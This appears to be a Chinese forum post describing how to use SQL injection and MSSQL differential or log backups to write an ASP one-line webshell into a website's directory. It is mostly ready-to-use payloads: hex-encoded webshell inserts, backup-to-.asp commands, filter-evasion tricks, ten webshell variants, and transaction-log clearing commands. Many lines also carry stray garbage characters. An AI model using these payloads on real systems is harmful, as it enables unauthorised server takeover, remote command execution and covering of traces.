MSsql差异备份总结

admin

差异备份的流程大概这样：
6 m, L1 e  r4 X  u$ V1.完整备份一次(保存位置当然可以改)
0 o3 Z, R8 ~! y: ?+ {backup database 库名 to disk = 'c:\ddd.bak';--
! j% j2 e$ J  K- z6 C$ ]. l
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
# @/ o5 S9 n  O4 {/ R; x/ W% d2 }insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

4 j: Z7 S/ H( g3 k! Q( ~9 V3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

# s( J, J  e, s) ^6 v) h7 H& e5 Y上面
+ z4 h8 g7 J3 Z8 B8 Z0x3C25657865637574652872657175657374282261222929253E
1 h; x5 T' H7 |/ g$ C$ c就是一句话木马的内容：<%execute(request("a"))%>
6 o' v( j5 F, U! h7 g6 r& H
( w; t4 e4 ~4 E7 e! |如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
& X) ~7 N& _5 o* }, f步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
' r3 {& W. M& l  ]  O' N9 P7 n: Q
9 C/ ]( f4 D# T4 t  a  {0 {3 Qcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

% ~0 D, ?; w: K1 b9 S# Udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
7 M0 d( l! m* i4 F- x' o
* G' z( c( C9 G8 L) F: s2 Kdrop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
4 ~% k  w, O. j( G# f0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
' W" |; }0 d5 G. f1 n0 L. ?( a% _0 \0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
* a/ u3 A/ l* d5 h' ^, G
5 P8 t% F1 O; |. V$ ^% u- h8 Q; s声明：方法不是我想的，我只是写工具，默认得到shell是
( |  b8 }: i& l2 T4 K. |4 H& d<%execute(request("a"))%>
8 j) A  e; }  |2 x/ K6 I5 [% v===============================================================

我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'
2 \' i7 V7 l! A2 B& ^/ @
+ M4 k0 |& U- @. Fcreate table [dbo].[dtest] ([cmd] [image]);
9 C$ ]$ f1 B. L; R7 @
9 i- |1 d) {) D8 linsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

1 W. b0 n% T* y0 Z: `backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
: v1 k! I; K* I& l$ d0 Z- R
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

  ^' L2 I2 h5 T) C7 [库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
4 d, F( M$ Z9 h( s! b8 F=====================================================
/ O6 w: p; h+ d: T另一种log增量备份技术:

';alter database null set RECOVERY FULL--
% l" Z0 ]' L' y4 L
';create table cmd (a image)--
* \' y3 B5 D% Y8 m2 v
3 V$ d% v- W: k# `' L3 w& e';backup log null to disk = 'f:\cmd' with init--
" y0 i( L1 V6 {' _
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
$ P# T* q- A+ y% B* P. {: \7 w
';backup log null to disk = '备份路径'--

4 g  T! n5 ]+ I( z( S';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
) q* Z+ O2 B4 C9 f! m* l9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：
" u/ f- k5 u8 H
- B$ m% T$ _4 fa)<%%25Execute(request("a"))%%25>
- K& P) T9 O3 [b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
8 A) r& {0 V5 |$ i) L( n, x9 vg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
% }: [! ?+ }3 m+ c1 jh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
7 b, F7 r0 {5 ?+ b5 l" Q- v
=============================================

当遇到差备过滤了/时用这个语句代替
7 E) H8 V- M* r2 Y( s6 S0 B
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行
! H: e$ G; s+ h( i

减少备份文件大小方法如下:
% A8 g/ U0 \; K" o* m
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
" ]. ]' j) S. q. |. ]- U, n( t; C2
. W" U8 d. @" ^8 z4 yid=1;backup database model to disk='你的路径‘ with differential,format;--
3 m* P) t3 p. O1 J0 q2 s
4 ]8 S8 Y- z& O
- K, T& U8 G( f" J' F. _3 j+ q5 A+ D! J
SQL语句清理日志
5 J1 P- F0 O0 Z( @注：test为数据库名
3 I# A: V' {# n3 j
  M# h. v$ G$ m! U' S--清空日志
DUMP TRANSACTION test WITH NO_LOG

--截断事务日志
8 w9 O' v( P- }BACKUP LOG test WITH NO_LOG

3 `4 y: h# a% ]* U--收缩数据库
7 X( `6 _+ x! q9 m4 zDBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
9 J( a) S% ^& k" Q! P( N
--以后能自动收缩
) o5 I- y4 {. l: M6 G6 I6 BEXEC sp_dboption 'test', 'autoshrink', 'TRUE'